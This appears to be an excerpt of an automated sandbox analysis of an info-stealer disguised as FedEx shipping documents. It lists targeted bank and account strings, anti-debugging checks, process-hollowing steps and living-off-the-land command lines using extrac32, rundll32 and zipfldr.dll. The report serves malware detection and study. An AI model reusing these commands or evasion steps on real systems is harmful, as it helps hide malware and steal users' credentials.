        Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
        Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC75000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
        Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
        Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
        Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
        Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC75000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
        Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC75000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
        Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
        Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
        Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC75000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
        Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC75000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
        Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC75000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
        Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC75000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
        Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
        Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC75000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
        Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
        Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC75000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
        Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC75000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
        Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC75000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
        Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC75000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
        Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
        Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
        Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC75000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
        Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
        Source: FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, 00000000.00000002.1459096681.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000003.1866772092.0000000027962000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000003.1628044255.0000000027962000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000003.1811277780.0000000027962000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000002.3925568800.0000000027962000.00000004.00000020.00020000.00000000.sdmp, Mxhvdwzh.PIF, 0000000B.00000002.1591690735.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, Mxhvdwzh.PIF, 0000000D.00000002.1676910673.00000000006F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
        Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
        Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC75000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
        Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC75000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
        Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
        Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC75000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
        Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC75000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
        Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC75000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
        Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC75000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
        Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC75000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
        Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC75000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
        Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC75000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
        Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC75000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeAPI call chain: ExitProcess graph end nodegraph_0-23390
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifAPI call chain: ExitProcess graph end nodegraph_7-104118
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFAPI call chain: ExitProcess graph end node
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information queried: ProcessInformationJump to behavior

        Anti Debugging

        barindex
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeCode function: 0_2_02D6AEB0 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,0_2_02D6AEB0
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFProcess queried: DebugPortJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFProcess queried: DebugPort
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D439698 LdrInitializeThunk,7_2_2D439698
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_0040CE09
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,@__unlockDebuggerData$qv,VariantClear,VariantClear,VariantClear,7_2_004019F0
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeCode function: 0_2_02D63E98 LoadLibraryW,GetProcAddress,FreeLibrary,0_2_02D63E98
        Source: C:\Users\Public\ndpha.pifCode function: 9_2_00593F6B mov esi, dword ptr fs:[00000030h]9_2_00593F6B
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_0040ADB0 GetProcessHeap,HeapFree,7_2_0040ADB0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess token adjusted: DebugJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_0040CE09
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_0040E61C
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00416F6A
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_004123F1 SetUnhandledExceptionFilter,7_2_004123F1
        Source: C:\Users\Public\ndpha.pifCode function: 9_2_00596510 SetUnhandledExceptionFilter,9_2_00596510
        Source: C:\Users\Public\ndpha.pifCode function: 9_2_005961C0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_005961C0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifMemory allocated: page read and write | page guardJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeMemory allocated: C:\Users\Public\Libraries\hzwdvhxM.pif base: 400000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFMemory allocated: C:\Users\Public\Libraries\hzwdvhxM.pif base: 400000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFMemory allocated: C:\Users\Public\Libraries\hzwdvhxM.pif base: 400000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection unmapped: C:\Users\Public\Libraries\hzwdvhxM.pif base address: 400000Jump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection unmapped: C:\Users\Public\Libraries\hzwdvhxM.pif base address: 400000Jump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection unmapped: C:\Users\Public\Libraries\hzwdvhxM.pif base address: 400000
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeMemory written: C:\Users\Public\Libraries\hzwdvhxM.pif base: 3DB008Jump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFMemory written: C:\Users\Public\Libraries\hzwdvhxM.pif base: 3E9008Jump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFMemory written: C:\Users\Public\Libraries\hzwdvhxM.pif base: 282008
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeProcess created: C:\Users\Public\Libraries\hzwdvhxM.pif C:\Users\Public\Libraries\hzwdvhxM.pifJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\rundll32.exe C:\\Users\\Public\\ndpha.pifJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\ndpha.pif C:\\Users\\Public\\ndpha.pif zipfldr.dll,RouteTheCall C:\Windows \SysWOW64\svchost.pif Jump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFProcess created: C:\Users\Public\Libraries\hzwdvhxM.pif C:\Users\Public\Libraries\hzwdvhxM.pifJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFProcess created: C:\Users\Public\Libraries\hzwdvhxM.pif C:\Users\Public\Libraries\hzwdvhxM.pif
        Source: hzwdvhxM.pif, 0000000C.00000002.3928176067.0000000025D2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR
        Source: hzwdvhxM.pif, 00000007.00000002.3928012467.00000000297DE000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3928176067.0000000025D2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02D55510
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeCode function: GetLocaleInfoA,0_2_02D5A17C
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeCode function: GetLocaleInfoA,0_2_02D5A130
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02D5561C
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: GetLocaleInfoA,7_2_00417A20
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,11_2_03045510
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFCode function: GetLocaleInfoA,11_2_0304A17C
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,11_2_0304561B
        Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeCode function: 0_2_02D58BB0 GetLocalTime,0_2_02D58BB0
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeCode function: 0_2_02D5B0B0 GetVersionExA,0_2_02D5B0B0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: 0000000E.00000002.3931012039.000000002A8C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.3928012467.0000000029711000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.3928176067.0000000025C81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 12.2.hzwdvhxM.pif.25c20000.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.hzwdvhxM.pif.294202f6.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.hzwdvhxM.pif.287d0000.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.hzwdvhxM.pif.2d540000.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.3.hzwdvhxM.pif.2792f7f8.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.hzwdvhxM.pif.2a601216.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.hzwdvhxM.pif.2c440000.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.hzwdvhxM.pif.25c20000.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.hzwdvhxM.pif.259d1216.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.hzwdvhxM.pif.2bdf0f20.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.3.hzwdvhxM.pif.28abccf0.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.hzwdvhxM.pif.287d0000.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.hzwdvhxM.pif.2a601216.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.hzwdvhxM.pif.259d1216.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.hzwdvhxM.pif.2a6002f6.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.3.hzwdvhxM.pif.28abccf0.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.hzwdvhxM.pif.25c20f20.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.3.hzwdvhxM.pif.2792f7f8.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.hzwdvhxM.pif.2bdf0000.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.3.hzwdvhxM.pif.23e4cb50.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.hzwdvhxM.pif.29421216.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.hzwdvhxM.pif.2c440000.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.hzwdvhxM.pif.2cee0000.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.hzwdvhxM.pif.29421216.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.3.hzwdvhxM.pif.23e4cb50.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.hzwdvhxM.pif.2a6002f6.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.hzwdvhxM.pif.25c20f20.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.hzwdvhxM.pif.259d02f6.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.hzwdvhxM.pif.2d540000.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.hzwdvhxM.pif.259d02f6.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.hzwdvhxM.pif.2cee0f20.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.hzwdvhxM.pif.2bdf0000.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.hzwdvhxM.pif.294202f6.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.hzwdvhxM.pif.2cee0f20.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.hzwdvhxM.pif.2cee0000.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.hzwdvhxM.pif.2bdf0f20.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000007.00000002.3932898237.000000002C440000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.1592650424.0000000023E4C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.3932320588.00000000287D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.3930139292.000000002A5C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.3936711785.000000002D540000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000003.1467552479.000000002792F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.3927698614.0000000025990000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.3927909311.0000000025C20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000003.1679054721.0000000028ABC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.3935796158.000000002CEE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.3932322793.000000002BDF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.3927113421.00000000293E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.3928012467.00000000297DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: hzwdvhxM.pif PID: 7632, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: hzwdvhxM.pif PID: 8004, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: hzwdvhxM.pif PID: 8172, type: MEMORYSTR
        Source: Yara matchFile source: 12.2.hzwdvhxM.pif.25c20000.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.hzwdvhxM.pif.294202f6.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.hzwdvhxM.pif.287d0000.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.hzwdvhxM.pif.2d540000.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.3.hzwdvhxM.pif.2792f7f8.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.hzwdvhxM.pif.2a601216.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.hzwdvhxM.pif.2c440000.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.hzwdvhxM.pif.25c20000.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.hzwdvhxM.pif.259d1216.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.hzwdvhxM.pif.2bdf0f20.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.3.hzwdvhxM.pif.28abccf0.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.hzwdvhxM.pif.287d0000.7.raw.unpack, type: UNPACKEDPE
